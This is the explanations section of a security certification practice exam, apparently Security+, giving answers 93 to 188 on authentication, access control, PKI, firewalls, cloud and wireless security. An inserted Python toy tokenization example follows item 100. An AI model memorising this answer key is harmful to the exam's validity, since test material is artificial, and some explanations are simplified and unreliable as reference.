93. A. Network taps copy all traffic to another destination, allowing traffic visibility without a device inline. They are completely passive methods of getting network traffic to a central location. Port mirroring would get all the traffic to the network-based intrusion prevention system (NIPS) but is not completely passive. It requires the use of resources on switches to route a copy of the traffic. Incorrect switch configurations can cause looping. Configuring loop detection can prevent looped ports. Putting a network IPS on every segment can be very expensive and require extensive configuration work. Option D is incorrect. This is not the assignment. Setting up a NIPS on each segment would also dramatically increase administrative efforts.

94. C. Federating RADIUS allows organizations to permit users from other partner organizations to authenticate against their home systems, and then be allowed onto the local organization's network. An example of this is the eduroam federation used by higher education institutions to permit students, faculty, and staff to use college networks anywhere they go where eduroam is in place. Preshared keys are determined by the location organization and would not permit enterprise credentials from other organizations to be used. OpenID is used for web authentication, and 802.11q is a trunking protocol.

95. C. Context-aware authentication can take into account information like geolocation to ensure that the devices can only be logged into when they are inside of the facility's boundaries. That means the devices will only be useful on-site and can help protect the data and applications on the devices. Neither PINs nor biometrics can do this, and content-aware authentication was made up for this question.

96. B. A TPM, or Trusted Platform Module, is a secure cryptoprocessor used to provide a hardware root of trust for systems. They enable secure boot and boot attestation capabilities, and include a random number generator, the ability to generate cryptographic keys for specific uses, and the ability to bind and seal data used for processes the TPM supports.

97. B. Internet key exchange (IKE) is used to set up security associations (SAs) on each end of the tunnel. The security associations have all the settings (i.e., cryptographic algorithms, hashes) for the tunnel. IKE is not directly involved in encrypting or authenticating. IKE itself does not establish the tunnel—it establishes the SAs.

98. A. A root certificate is the base certificate that signs an entire certificate chain. A common security practice to protect these incredibly important certificates is to keep the root certificate and CA offline to prevent the potential of compromise or exposure. Machine/computer, user, and email certificates are deployed and used throughout organizations and, since they are used on a frequent basis, aren't likely to be kept offline.

99. A. The NIPS is not seeing the traffic on that network segment. By implementing port mirroring, the traffic from that segment can be copied to the segment where the NIPS is installed. Installing a network IPS on the segment would require additional resources. This would work but is not the most efficient approach. Nothing in this scenario suggests that the NIPS is inadequate. It just is not seeing all the traffic. Finally, isolating the segment to its own VLAN would isolate that network segment but would still not allow the NIPS to analyze the traffic from that segment.

100. B. Tokenization is used to protect data by substituting tokens for sensitive data without changing the length or data type. This allows databases to handle the data in the same way as it was prior to tokenization, ensuring that existing software will not run into problems due to the data being changed. Encryption provides similar protection but will normally change either the data length, the data type, or both. Hashing is one-way, which means it is not a good fit for many scenarios where tokenization or encryption will protect data. Rotation is not a security method used for this type of work.
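The length- and type-preserving substitution this explanation describes, as an added example that is not code from the book. The `TokenVault` class, its in-memory mapping, and the rule it uses (a random digit for each digit, a random letter for each letter, separators left in place) are assumptions of the example; a production tokenization service keeps the vault in hardened, access-controlled storage, but the shape-preserving property it relies on is the same.

```python
import secrets
import string
from typing import Dict


class TokenVault:
    """Toy tokenization vault: the real value lives only here; callers keep the token."""

    def __init__(self) -> None:
        self._to_token: Dict[str, str] = {}
        self._to_value: Dict[str, str] = {}

    @staticmethod
    def _random_like(value: str) -> str:
        """Build a random string with the same length and per-position character class."""
        if not any(ch.isalnum() for ch in value):
            raise ValueError("value has no characters that can be tokenized")
        out = []
        for ch in value:
            if ch.isdigit():
                out.append(secrets.choice(string.digits))
            elif ch.isalpha():
                pool = string.ascii_uppercase if ch.isupper() else string.ascii_lowercase
                out.append(secrets.choice(pool))
            else:
                out.append(ch)  # separators such as '-' stay, so format checks still pass
        return "".join(out)

    def tokenize(self, value: str) -> str:
        """Return the token for value, minting one on first sight (stable thereafter)."""
        if value in self._to_token:
            return self._to_token[value]
        while True:
            token = self._random_like(value)
            if token != value and token not in self._to_value:
                break
        self._to_token[value] = token
        self._to_value[token] = value
        return token

    def detokenize(self, token: str) -> str:
        """Resolve a token back to the original value (KeyError if unknown)."""
        return self._to_value[token]


def preserves_shape(value: str, token: str) -> bool:
    """True when token has the same length and per-position character class as value."""
    return len(value) == len(token) and all(
        a.isdigit() == b.isdigit() and a.isalpha() == b.isalpha()
        for a, b in zip(value, token))


if __name__ == "__main__":
    vault = TokenVault()
    card = "4111-1111-1111-1111"   # constructed sample value
    token = vault.tokenize(card)
    print("stored in the application database:", token)
    print("same length and type:", preserves_shape(card, token))
    print("vault resolves it back:", vault.detokenize(token) == card)
```

A column declared as a 19-character string of digits and dashes keeps accepting the tokenized value unchanged, which is the compatibility benefit the explanation contrasts with encryption (whose ciphertext is longer and binary) and hashing (which cannot be reversed).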

101. A. Elenora could deploy a log aggregator at each location to collect and aggregate the logs. Log collection and aggregation systems can then filter unneeded log entries, compress the logs, and forward desired logs to a central security system like a security information and event management (SIEM) or other log analysis collection and analysis tool. A honeypot acts like a desirable target, luring attackers in to capture data about their attacks. A bastion host is designed to resist attacks and normally provides a single service to the network on which it resides.

102. D. Fuzzing is an automated, dynamic software testing technique that sends unexpected and often invalid data to a program to test how it responds. The software is monitored to see how it responds to the input, providing additional assurance that the program has proper error handling and input validation built in. Timeboxing is an agile project management technique; buffer overflows may occur as part of fuzzing, but are not the only technique used or described here; and input validation can help stop fuzzing from causing problems for an application by preventing out-of-bounds or unwanted data from being accepted.

103. B. Dynamic Host Configuration Protocol (DHCP) snooping can be set up on switches to monitor for and stop rogue DHCP traffic from unknown servers. Disabling DHCP snooping would remove this feature. Intrusion detection systems (IDSs) cannot stop traffic, and blocking DHCP traffic would prevent systems from acquiring dynamic IP addresses.

104. B. Endpoint detection and response (EDR) focuses on identifying anomalies and issues, but it is not designed to be a malware analysis tool. Instead, the ability to search and explore data, identify suspicious activities, and coordinate responses is what makes up an EDR tool.

105. A. A web proxy can be used to block certain websites. It is common practice for network administrators to block either individual sites or general classes of sites (like job-hunting sites). Network address translation (NAT) is used to translate the private IP addresses of internal computers to public IP addresses. A packet filter firewall can block traffic on a given port or IP address or using a particular protocol, but generally they are not able to block specific websites. Network-based intrusion prevention systems (NIPSs) identify and block attacks; they cannot prevent users from visiting specific websites.

106. C. Secrets management services provide the ability to store sensitive data like application programming interface (API) keys, passwords, and certificates. They also provide the ability to manage, retrieve, and audit those secrets. A public key infrastructure (PKI) would focus on certificates and encryption keys, without passwords or API keys. A Trusted Platform Module (TPM) is associated with hardware, and a hush service was made up for this question.

107. A. SAML, the Security Assertion Markup Language, is used by many identity providers to exchange authorization and authentication data with service providers. Kerberos and LDAP (Lightweight Directory Access Protocol) are used inside many organizations, but Fred will find more success with SAML for popular web services. New Technology LAN Manager (NTLM) remains in use for Windows systems, but Kerberos is more commonly used for modern Windows domains and would not be used in the scenario described here.

108. D. Load balancing the cluster will prevent any single server from being overloaded. And if a given server is offline, other servers can take on its workload. Option A is incorrect. A VPN concentrator, as the name suggests, is used to initiate virtual private networks (VPNs). Option B is incorrect. Aggregate switching can shunt more bandwidth to the servers but won't mitigate the threat of one or more servers being offline. Option C is incorrect. SSL accelerators are a method of offloading processor-intensive public-key encryption for Transport Layer Security (TLS) and Secure Sockets Layer (SSL) to a hardware accelerator.

109. C. The three channels that do not overlap are 1, 6, and 11. The rest of the channels will overlap. In an ideal installation, these three channels can be used to maximize throughput and minimize interference.

110. B. The correct answer is to encrypt all the web traffic to this application using Transport Layer Security (TLS). This is one of the most fundamental security steps to take with any website. A web application firewall (WAF) is probably a good idea, but it is not the most important thing for Ryan to implement. While a network-based intrusion prevention system (IPS) or intrusion detection system (IDS) may be a good idea, those should be considered after TLS is configured.

111. B. Infrared (IR) is the only line-of-sight method on the list. Although Near-Field Communication (NFC) and Bluetooth have a relatively short range, they can still operate through materials placed between them and the receiver, and Wi-Fi can do so at an even longer range.

112. A. The correct answer is that Kerberos uses various tickets, each with a time limit. The service tickets are typically only good for 5 minutes or less. This means that if the Network Time Protocol (NTP) is failing, valid tickets may appear to be expired. RADIUS, CHAP, and LDAP will not have any significant effect due to NTP failure.

113. C. The correct answer is that Challenge Handshake Authentication Protocol (CHAP) periodically has the client reauthenticate. This is transparent to the user but is done specifically to prevent session hijacking. Password Authentication Protocol (PAP) is actually quite old and does not reauthenticate. In fact, it even sends the password in cleartext, so it should not be used any longer. SPAP (Shiva Password Authentication Protocol) adds password encryption to PAP but does not reauthenticate. OAuth is used in web authentication and does not reauthenticate.

114. B. A software firewall is best suited to deployments to individual machines, particularly when endpoint systems are being protected. Hardware firewalls are typically deployed to protect network segments or groups of systems, and result in additional expense and management. Virtual and cloud firewalls are most often deployed in datacenters where virtual or cloud environments are in use, although a virtual firewall could be run on an endpoint.

115. D. A service account is the most appropriate in this scenario. Service accounts are given the least privileges the service needs and are used by the service, without the need for a human user. Although you could assign a user account, it is not as good a solution as using a service account. A guest account would never be a good idea for a service. Guest accounts are typically too limited. It's common practice to disable default accounts such as the Guest account. An admin account would give too many privileges to the service and violate the principle of least privileges.

116. A. Of these versions of Extensible Authentication Protocol (EAP), only Lightweight Extensible Authentication Protocol (LEAP) does not support TLS. EAP Tunneled Transport Layer Security (EAP-TTLS) actually extends TLS, but supports the underlying protocol. Protected Extensible Authentication Protocol (PEAP) encapsulates EAP within an encrypted TLS tunnel.

117. C. Jailbreaking allows users to add software to an iPhone that isn't normally allowed, including third-party applications, changing system settings, themes, or default applications. Third-party application stores aren't available by default, and side-loading can be accomplished in iOS but doesn't do what Manny wants it to, and of course installing Android won't let Manny change iOS settings. If Manny does jailbreak his phone, his organization may notice if they're using a mobile device management (MDM) or unified endpoint management (UEM) application to track the status of the device.

118. C. Many smartcards implement Radio Frequency Identification (RFID) to allow them to be used for entry access and other purposes. Wi-Fi, Infrared, and Bluetooth generally require powered circuits to interact with systems, making them a poor fit for a smartcard that does not typically have a battery or other power source.

119. A. Mandatory access control (MAC) is the correct solution. It will not allow lower privileged users to even see the data at a higher privilege level. Discretionary access control (DAC) has each data owner configure his or her own security. Role-based access control (RBAC) could be configured to meet the needs, but it's not the best solution for these requirements. Security Assertion Markup Language (SAML) is not an access control model.

120. B. An agent-based, preadmission system will provide greater insight into the configuration of the system using the agent, and using a preadmission model will allow the system configuration to be tested before the system is allowed to connect to the network. Agentless NAC uses scanning and/or network inventory techniques and will typically not have as deep a level of insight into the configuration and software versions running on a system. Postadmission systems make enforcement decisions based on what users do after they gain admission to a network, rather than prior to gaining admission, allowing you to quickly rule out two of these options.

121. C. Claire's best option is to deploy a detection and fix via her web application firewall (WAF) that will detect the SQL injection attempt and prevent it. An intrusion detection system (IDS) only detects attacks and cannot stop them. Manually updating the application code after reverse-engineering it will take time, and she may not even have the source code or the ability to modify it. Finally, vendor patches for zero days typically take some time to come out even in the best of circumstances, meaning that Claire could be waiting on a patch for quite a while if that is the option she chooses.

122. C. CYOD, or choose your own device, allows users to choose a device that is corporate owned and paid for. Choices may be limited to a set of devices, or users may be allowed to choose essentially any device depending on the organization's deployment decisions. BYOD allows users to bring their own device, whereas COPE, or corporate-owned, personally enabled, provides devices to users that they can then use for personal use. VDI uses a virtual desktop infrastructure as an access layer for any security model where specialized needs or security requirements may require access to remote desktop or application services.

123. B. The key element here is that the certificate authorities (CAs) are operating in a mesh, meaning no CA is the root CA and that each must trust the others. To accomplish this, Derek first needs to issue certificates from D to each of the other CAs and then have the others issue D a certificate. Private keys should never be exchanged, and of course if he only has the other systems issue D certificates, they won't recognize his server.

124. C. If Claire is using Simple Network Management Protocol (SNMP) to manage and monitor her network devices, she should make sure she is using SNMPv3 and that it is properly configured. SNMPv3 can provide information about the status and configuration of her network devices. Remote Authentication Dial-In User Service (RADIUS) might be used to authenticate to the network, but Transport Layer Security (TLS) and SSH File Transfer Protocol (SFTP) are not specifically used for the purposes described.

125. D. Fuzzers send unexpected and out-of-range data to applications to see how they will respond. In this case, Ben is using a fuzzer. Web proxies are often used to do application testing because they allow data to be changed between the browser and the application. SQL injection may be done via a web proxy, but a dedicated SQL injection proxy is not a type of tool by itself. Finally, a static code review tool is used to review source code and may be as simple as a Notepad application or as complex as a fully integrated development environment (IDE).

126. B. Containerization will allow Eric's company's tools and data to be run inside of an application-based container, isolating the data and programs from the self-controlled bring your own device (BYOD) devices. Storage segmentation can be helpful, but the operating system itself as well as the applications would remain a concern. Eric should recommend full-device encryption (FDE) as a security best practice, but encrypting the container and the data it contains can provide a reasonable security layer even if the device itself is not fully encrypted. Remote wipe is helpful if devices are lost or stolen, but the end user may not be okay with having the entire device wiped, and there are ways to work around remote wipes, including blocking cellular and Wi-Fi signals.

127. B. Kerberos does not send the user's password across the network. When the user's name is sent to the authentication service, the service retrieves the hash of the user's password from the database, and then uses that as a key to encrypt data to be sent back to the user. The user's machine takes the password that the user entered, hashes it, and then uses that as a key to decrypt what was sent back by the server. Challenge Handshake Authentication Protocol (CHAP) sends the user's password in an encrypted form. RBAC is an access control model, not an authentication protocol. Type II authentication is something you have, such as a key or card.

128. A. EV, or extended validation, certificates prove that the X.509 certificate has been issued to the correct legal entity. In addition, only specific certificate authorities (CAs) can issue EV certificates. Domain-validated certificates require proof that you have control of the domain, such as setting the DNS TXT record or responding to an email sent to a contact in the domain's Whois record. An organizational validation certificate requires domain validation and additional proof that the organization is a legal entity. OCSP certificates were made up for this question.

129. D. Wi-Fi 5 networks can provide theoretical throughput up to 3.5 Gbps, although newer standards like Wi-Fi 6 continue to push this higher. The next fastest wireless standard listed is LTE cellular with theoretical throughputs around 50 megabits per second. When bandwidth is important, Wi-Fi will tend to win, although 5G cellular networks under ideal conditions may rival Wi-Fi.

130. C. The cost of applications and the quality of the security implementation can vary based on the vendor and product, but cloud-native security solutions will generally have better and deeper integration into the cloud platform than third-party solutions will. Vendor diversity in designs may still drive other choices, but those are conscious design decisions.

131. D. Jump boxes are a common solution for providing access to a network with a different security profile. In this case, Ed can deploy a jump box in the demilitarized zone (DMZ) to allow users within his administrative zone to perform tasks without directly connecting to the world-exposed DMZ. This helps keep administrative systems secure and allows him to focus on the security of the jump box, while also making it easier to monitor and maintain. An intrusion prevention system (IPS) is used to monitor and block unwanted traffic, but isn't used for remote access. A NAT gateway performs network address translation and is placed between networks but is not typically used to provide secure connections between networks. Instead, it serves to reduce the number of public IP addresses used and to provide some limited security for systems behind it. Routers are used to connect to networks but are not used to provide secure access as described in the question.

132. C. OAuth (Open Authorization) is an open standard for token-based authentication and authorization on the Internet and allows an end user's account information to be used by third-party services, without exposing the user's password. Kerberos is a network authentication protocol and not used for cross-domain/service authentication. Security Assertion Markup Language (SAML) is an XML-based, open-standard data format for exchanging authentication and authorization data between parties. OpenID is an authentication service often provided by a third party, and it can be used to sign into any website that accepts OpenID. It would be possible for this to work, but only with websites that support OpenID, so it is not as good a solution as OAuth.

133. A. Session persistence makes sure that all of a client's traffic for a transaction or session goes to the same server or service. The remaining options do not properly describe how session persistence works.

134. B. Data loss prevention (DLP) tools allow sensitive data to be tagged and monitored so that if a user attempts to send it, they will be notified, administrators will be informed, and if necessary, the data can be protected using encryption or other protection methods before it is sent. Full-disk encryption (FDE) would protect data at rest, and S/MIME and POP3S would protect mail being retrieved from a server but would not prevent the SSNs from being sent.

135. B. While infrastructure as a service (IaaS) vendors often provide strong support for high availability, including replication to multiple geographic zones or regions, as well as highly reliable and secure storage, they do not allow direct access to the underlying hardware in most instances. If Jennifer requires direct access to hardware, she will need to deploy to a datacenter where she can retain access to the physical servers.

136. B. Out-of-band (OOB) management uses separate management interfaces, as shown in the figure, or a different connectivity method than the normal connection to provide a secure means of managing systems. A DMZ, or demilitarized zone, is a security zone that is typically exposed to the world and is thus less trusted and more exposed. In-band management uses common protocols like Secure Shell (SSH) or HTTPS to manage devices via their normal interfaces or network connections. Transport Layer Security (TLS) is a security protocol, not a management interface.

137. A. Key escrow provides encryption keys to a third party so that they can be released to an appropriate party if certain conditions are met. Although this means that the keys are out of the control of the owning or responsible party, in many cases the need to have a recoverable or accessible way to get to the keys overrides the requirement to keep the keys in a single individual or organization's hands. The remaining options were made up, but you may encounter the term "key recovery," which is a process where law enforcement or other parties may recover keys when needed using a process that provides them with an access key or decryption key that may not be the same key as the key used by the original encryption user.

138. D. Boot attestation requires systems to track and measure the boot process and to then attest to a system that the process was secure. Secure boot, which is a related concept, allows only trusted software to be run using previously hashed values to ensure the process is secure. BOOTP and BIOS are not involved in this process; instead, Unified Extensible Firmware Interface (UEFI) firmware supports both secure boot and boot attestation.

139. A. The correct answer is that OpenID is an authentication service often done by a third party, and it can be used to sign into any website that accepts OpenID. Kerberos is a network authentication protocol for use within a domain. New Technology LAN Manager (NTLM) is an older Windows authentication protocol. Shibboleth is a single sign-on system, but it works with federated systems.

140. C. Disabling remote registry access for systems that do not require it can prevent remote registry modification and reads. This is a recommended best practice whenever possible, but some systems may require remote registry access for management or other reasons. The Windows registry is not independently patched, the registry needs to be readable and writable to have a functional Windows system, and there is no mode that encrypts user keys.

141. D. Maximizing coverage overlap would cause greater contention between access points. Instead, installations should minimize overlap without leaving dead spots in important areas. Performing a site survey, controlling power levels and adjusting them to minimize contention, and designing around the construction materials of a building are all important parts of designing the physical layout and placement of WAPs. Fortunately, modern enterprise wireless networks have advanced intelligent features that help do many of these things somewhat automatically.

142. B. Disabling the account is the best option to meet Mark's needs. Disabling an account will leave it in a different state than an active account or one with a changed password, which should be noted by support staff if Gabby called and asked to change her password. That means that there is less risk of a disgruntled employee or an attacker successfully gaining access to the account. At the same time, disabling is less destructive than deleting the account, making it faster to restore and preserving her files and other materials. Most organizations will choose to have a time limit for how long an account can be in a disabled state without review or moving to another account state to help ensure that disabled accounts do not build up over time.

143. A. Attribute-based access control (ABAC) looks at a group of attributes, in addition to the login username and password, to make decisions about whether or not to grant access. One of the attributes examined is the location of the person. Since the users in this company travel frequently, they will often be at new locations, and that might cause ABAC to reject their logins. Wrong passwords can certainly prevent login, but are not specific to ABAC. ABAC does not prevent remote access, and a firewall can be configured to allow, or prohibit, any traffic you wish.

144. B. Single Sign-On (SSO) is designed specifically to address this risk and would be the most helpful. Users have only a single logon to remember; thus, they have no need to write down the password. OAuth (Open Authorization) is an open standard for token-based authentication and authorization on the Internet. It does not eliminate the use or need for multiple passwords. Multifactor authentication helps prevent risks due to lost passwords, but does not remove the need for multiple passwords by itself. Security Assertion Markup Language (SAML) and Lightweight Directory Access Protocol (LDAP) do not stop users from needing to remember multiple passwords.

145. D. Rule-based access control applies a set of rules to an access request. Based on the application of the rules, the user may be given access to a specific resource that they were not explicitly granted permission to. MAC, DAC, and role-based access control wouldn't give a user access unless that user has already been explicitly given that access.

146. B. Segmentation needs between multiple cloud virtual datacenters, the cost of operating the firewall service, and the visibility into traffic provided by the cloud service provider are all design elements Ed will need to consider. He won’t, however, need to worry about hardware access for updates. Instead, he is likely to either use a virtual cloud appliance or built-in firewall functionality provided by the cloud infrastructure service provider.

147. B. Tokens are physical devices that often contain cryptographic data for authentication. They can store digital certificates for use with authentication. OAuth (Open Authorization) is an open standard for token-based authentication and authorization on the Internet. The user still must remember a password. OpenID is a third-party authentication service, and just as with OAuth, the user also still must remember a password. Role-based access control and rule-based access control (which both use the acronym RBAC) are access control models.


148. A. Internal services like this are part of an intranet, a network, or website only accessible to individuals and systems inside of a company. Extranets are private networks that allow access to partners or customers, but not to the general public. A demilitarized zone (DMZ) is a network segment exposed to the Internet or another untrusted network. A TTL is a network term that means time to live, and it determines how many hops a packet can make before it is no longer able to be sent to another hop.

149. B. This question describes a stateless firewall, which looks at every packet to make decisions about what will be allowed through it. Stateful firewalls pay attention to the conversations and allow packets in a conversation between devices to pass through once they have verified the initial exchange. Next-generation firewalls (NGFWs) build in a wide variety of security services. Application-layer firewalls understand applications that run through them and provide deeper packet analysis capabilities to block unwanted application layer traffic.

150. C. Hardware security modules are available as smart cards, microSD cards, and USB thumb drives in addition to their frequent deployment as appliances in enterprise use. Nancy could purchase a certified and tested MicroSD card–based HSM that would protect her keys in a secure way. An application-based public key infrastructure (PKI) would not provide the same level of security on most mobile devices without specially designed hardware, which is not mentioned in this problem. OPAL is a hardware-based encryption standard and does not provide key management, and an offline certificate authority (CA) would not help in this circumstance.

151. D. Both the Windows and Linux filesystems work based on a discretionary access control scheme where file and directory owners can determine who can access, change, or otherwise work with files under their control. Role-based access control systems determine rights based on roles that are assigned to users. Rule-based access control systems use a series of rules to determine which actions can occur, and mandatory access control systems enforce control at the operating system level.

152. A. Restricting each faculty account so that it is only usable when that particular faculty member is typically on campus will prevent someone from logging in with that account after hours, even if they have the password. Usage auditing may detect misuse of accounts but will not prevent it. Longer passwords are effective security, but a longer password can still be stolen. Credential management is always a good idea, but it won’t address this specific issue.

153. D. Although next-generation firewalls provide many defensive capabilities, SQL injection is an attack instead of a defense. In addition to geolocation, intrusion detection system (IDS) and intrusion prevention system (IPS), and sandboxing capabilities, many next-generation firewalls include web application firewalls, load balancing, IP reputation and URL filtering, and antimalware and antivirus features.

154. C. Enabling storm control on a switch will limit the amount of total bandwidth that broadcast packets can use, preventing broadcast storms from taking down the network. Blocking Address Resolution Protocol (ARP) would prevent systems from finding each other, and blocking all broadcast packets would also block many important network features.

155. B. Demilitarized zones (DMZs) remain a useful concept when designing cloud environments, although the technical implementation may vary, since cloud providers may have secure web services, load-balancing capabilities or other features that make DMZs look different. Proxy servers are useful for controlling, filtering, and relaying traffic, but they do not provide the full segmentation that Isaac is looking for. A VPC is a virtual datacenter and will typically contain his infrastructure but does not specifically address these needs.

156. A. A permissions audit will find what permissions each user has and compare that to their job requirements. Permission audits should be conducted periodically. Job rotation, though beneficial for other security reasons, will actually exacerbate this problem. It is impractical to forbid anyone from ever changing job roles, and separation of duties would have no impact on this issue.

157. B. Susan’s best option is to deploy full-disk encryption (FDE), which will ensure that the entire drive is encrypted, rather than just specific folders or files. Degaussing magnetic drives will wipe them, rather than protecting data.

158. C. Password complexity requires that passwords have a mixture of uppercase letters, lowercase letters, numbers, and special characters. This would be the best approach to correct the problem described in the question. Longer passwords are a good security measure but will not correct the issue presented here. Changing passwords won’t make those passwords any stronger, and Single Sign-On (SSO) will have no effect on the strength of passwords.

159. D. WPA3’s Personal mode replaces the preshared key mode found in WPA2 with simultaneous authentication of equals. This makes weak passphrase or password attacks harder to conduct and allows for greater security when devices are conducting their initial key exchange. WEP, WPA, and WPA2 do not implement SAE.

160. C. Megan has created a guest account. Guest accounts typically have very limited privileges and may be set up with limited login hours, an expiration date, or other controls to help keep them more secure. User accounts are the most common type of account and are issued to individuals to allow them to log into and use systems and services. Shared accounts are used by more than one person, making it difficult to determine who used the account. A service account is typically associated with a program or service running on a system that requires rights to files or other resources.

161. B. API keys allow individual customers to authenticate to the API service, which means that if there is a problem Henry can disable the problematic API keys rather than all users. Enabling logging using a service like Amazon’s API Gateway allows scalability, logging, and monitoring, as well as tools like web application firewalls. An API proxy and API-centric intrusion prevention system (IPS) were made up for this question.

162. C. UTM, or unified threat management, devices commonly serve as firewalls, intrusion detection system (IDS)/intrusion prevention system (IPS), antivirus, web proxies, web application and deep packet inspection, secure email gateways, data loss prevention (DLP), security information and event management (SIEM), and even virtual private networking (VPN) devices. They aren’t mobile device management (MDM) or universal endpoint management devices, however, since their primary focus is on network security, not systems or device management.

163. B. Mandatory access control (MAC) is based on documented security levels associated with the information being accessed. Role-based access control (RBAC) is based on the role the user is placed in. Discretionary access control (DAC) lets the data owner set access control. BAC is not an access control model.

164. A. This image shows a forward proxy, which can be used to apply policies to user requests sent to web servers and other services. Reverse proxies act as gateways between users and application servers, allowing content caching and traffic manipulation. They are often used by content delivery networks to help with traffic management.

165. B. This type of potential security issue is typically recorded as an impossible travel time/risky login issue. Gurvinder would not expect the user to have traveled between two locations in an hour—in fact, it is impossible to do so. That means he needs to contact the user to find out if they may have done something like use a VPN, or if their account may be compromised. It is possible this could be an issue with the geo-IP system that Gurvinder’s company uses, but he needs to treat it like a security risk until he determines otherwise, and a compromise is more likely in most cases. A misconfigured IP address would not cause this issue.

166. A. Discretionary access control (DAC) allows data owners to assign permissions. Role-based access control (RBAC) assigns access based on the role the user is in. Mandatory access control (MAC) is stricter and enforces control at the OS level. Attribute-based access control (ABAC) considers various attributes such as location, time, and computer in addition to username and password.

167. A. OS hardening is the process of securing an operating system by patching, updating, and configuring the operating system to be secure. Configuration management is the ongoing process of managing configurations for systems, rather than this initial security step. Both security uplift and endpoint lockdown were made up for this question.

168. D. Secure Lightweight Directory Access Protocol (LDAPS) uses port 636 by default. DNS uses port 53, LDAP uses 389, and secure HTTP uses port 443.

169. C. The best answer for the needs Chris has identified is a hardware security module, or HSM. HSMs can act as a cryptographic key manager, including creating, storing, and securely handling encryption keys and certificates. They can also act as cryptographic accelerators, helping offload encryption functions like Transport Layer Security (TLS) encryption. A TPM (Trusted Platform Module) is a device used to store keys for a system but does not offload crypto processing, and it is used for keys on a specific system rather than broader uses. CPUs and GPUs may have cryptographic acceleration functions, but they do not securely store or manage certificates and other encryption artifacts.

170. D. A host-based intrusion prevention system (HIPS) can monitor network traffic to identify attacks, suspicious behavior, and known bad patterns using signatures. A firewall stops traffic based on rules; antimalware tools are specifically designed to stop malware, not attacks and suspicious network behavior; and a host-based intrusion detection system (HIDS) can only detect, not stop, these behaviors.

171. B. Role-based access control (RBAC) grants permissions based on the user’s position within the organization. Mandatory access control (MAC) uses security classifications to grant permissions. Discretionary access control (DAC) allows data owners to set permissions. Attribute-based access control (ABAC) considers various attributes such as location, time, and computer, in addition to username and password.

172. B. Measured boot provides a form of boot attestation that records information about each component loaded during the boot process. This information can then be reported to a server for validation. Trusted boot validates each component against a known signature. Measured boot does not care about the time to boot up, nor does it update the system’s Unified Extensible Firmware Interface (UEFI).

173. D. The key distribution center (KDC) issues tickets. The tickets are generated by the ticket-granting service, which is usually part of the KDC. The authentication service simply authenticates the user, X.509 certificates and certificate authorities are not part of Kerberos, and the ticket-granting service does generate the ticket but the KDC issues it.

174. C. Although patching devices is important, the most effective way to protect devices from being attacked via administrative account brute forcing is to place the devices on a separate management virtual LAN (VLAN) and then control access to that VLAN. This will prevent most attackers from being able to connect to the device’s administrative interfaces. Disabling administrative access may not be possible, and even if it was, it would create significant problems when the devices needed to have changes made on them.

175. A. While mobile device management (MDM) and unified endpoint management (UEM) tools provide many capabilities, carrier unlock status normally needs to be checked with the carrier if you want to validate corporate-owned phones without manually checking each device.

176. A. Zero-trust environments typically have a more complex network due to increased segmentation to isolate systems and devices that have different security contexts. Zero-trust networks also require strong identity and access management, and they use application-aware firewalls extensively to preserve least privilege. Of course, logging and analysis of security events is necessary to ensure that issues are identified and responded to.

177. A. Digital certificates use the X.509 standard (or the PGP standard) and allow the user to digitally sign authentication requests. OAuth allows an end user’s account information to be used by third-party services, without exposing the user’s password. It does not use digital certificates or support digital signing. Kerberos does not use digital certificates, nor does it support digitally signing. Smart cards can contain digital certificates but don’t necessarily have to have them.

178. C. SAML (Security Assertion Markup Language) is an Extensible Markup Language (XML) framework for creating and exchanging security information between partners online. The integrity of users is the weakness in the SAML identity chain. To mitigate this risk, SAML systems need to use timed sessions, HTTPS, and SSL/TLS. LDAP (Lightweight Directory Access Protocol) is a protocol that enables a user to locate individuals and other resources such as files and devices in a network. Terminal Access Controller Access Control System Plus (TACACS+) is a protocol that is used to control access into networks. TACACS+ provides authentication and authorization in addition to an accounting of access requests against a central database. Transitive trust is a two-way relationship that is automatically created between a parent and a child domain in a Microsoft Active Directory (AD) forest. It shares resources with its parent domain by default and enables an authenticated user to access resources in both the child and parent domains.

179. C. UEM, or unified endpoint management, manages desktops, laptops, mobile devices, printers, and other types of devices. Mobile device management (MDM) tools focus on mobile devices.

180. B. Host-based firewalls are the first step in most designs when protecting against network-borne threats. They can prevent unwanted traffic from entering or leaving the host, leaving less traffic for a host-based intrusion prevention system (HIPS) or other tools to analyze. Full-disk encryption (FDE) will not stop network-borne threats, and antivirus focuses on prevention of malware, not network threats like denial of service or exploitation of vulnerable services.


181. A. Security groups are a virtual firewall for instances, allowing rules to be applied to traffic between instances. Dynamic resource allocation is a concept that allows resources to be applied as they are needed, including scaling up and down infrastructure and systems on the fly. Virtual private cloud (VPC) endpoints are a way to connect to services inside of a cloud provider without an Internet gateway. Finally, instance awareness is a concept that means that tools know about the differences between instances, rather than treating each instance in a scaling group as the same. This can be important during incident response processes and security monitoring for scaled groups, where resources may all appear identical without instance awareness.

182. D. Although built-in update tools will handle the operating system, additional software installed on systems needs to be patched separately. Third-party software and firmware, including the Unified Extensible Firmware Interface (UEFI) or BIOS of the systems that are deployed in Derek’s organization, will need regular updates. Many organizations adopt patch management platforms or system management platforms with patching capabilities to ensure that this occurs on a broader basis than just OS patches.

183. A. IDSs, or intrusion detection systems, can only detect unwanted and malicious traffic based on the detection rules and signatures that they have. They cannot stop traffic or modify it. An IPS, or intrusion prevention system, that is placed in line with network traffic can take action on that traffic. Thus, IDSs are often used when it is not acceptable to block network traffic, or when a tap or other network device is used to clone traffic for inspection.

184. C. Although insider threats are a concern, they’re not any different for containers than any other system. Ensuring container host security, securing the management stack, and making sure that network traffic to and from containers is secure are all common container security concerns.

185. C. Network address translation (NAT) gateways allow internal IP addresses to be hidden from the outside, preventing direct connections to systems behind them. This effectively firewalls inbound traffic unless the gateway is set to pass traffic to an internal host when a specific IP, port, and protocol is used. They are not a firewall in the traditional sense, however, and do not specifically statefully block traffic by port and protocol, nor do they detect malicious traffic. Finally, NAT gateways are not used to send non-IP traffic out to IP networks.

186. C. Conditional access assesses specific conditions to make a determination about whether to allow an account to access a resource. The system may choose to allow access, to block access, or to apply additional controls based on the conditions that are present and the information that is available about the login.

187. B. If the system maintains a password history, that would prevent any user from reusing an old password. Password complexity and length are common security settings but would not prevent the behavior described. Multifactor authentication helps prevent brute-force attacks and reduces the potential impact of stolen passwords but would not help with this scenario.

188. D. Bridge Protocol Data Unit, or BPDU, guard protects network infrastructure by preventing unknown devices from participating in spanning tree. That prevents a new switch added by a user from claiming to be the root bridge (in this case, Switch C), which would normally cause a topology change and for traffic to be sent to Switch X, an undesirable result. 802.11n is a wireless protocol, and the remaining options were made up for this question.

